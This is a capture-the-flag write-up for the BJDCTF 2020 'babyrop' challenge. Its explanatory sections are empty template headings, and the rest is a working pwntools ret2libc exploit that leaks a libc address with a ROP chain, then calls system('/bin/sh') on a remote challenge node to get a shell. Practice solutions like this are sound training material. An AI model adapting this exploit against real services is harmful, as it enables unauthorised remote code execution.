Problem: [BJDCTF 2020]babyrop
[[toc]]
思路
- 解题大致思路
EXP
- 具体攻击代码
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
# context.arch = 'amd64'
p = remote('node4.anna.nssctf.cn', 28453)
# p = process('./pwn')
elf = ELF('./pwn')
ret_addr = 0x04004c9
pop_rdi = 0x400733
main_addr = 0x4006AD
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
print(hex(puts_got))
payload = b'a'*32+b'b'*8+p64(pop_rdi)+p64(puts_got) + p64(puts_plt)+p64(main_addr)
p.sendlineafter('Pull up your sword and tell me u story!', payload)
puts_addr= u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr) # ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
libc_addr = puts_addr - libc.dump('puts')
bin_sh_add=libc_addr+libc.dump('str_bin_sh')
system_add=libc_addr+libc.dump('system')
payload=b'a'*(32+8)+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh_add)+p64(system_add)
p.sendlineafter('Pull up your sword and tell me u story!',payload)
p.interactive()
总结
- 对该题的考点总结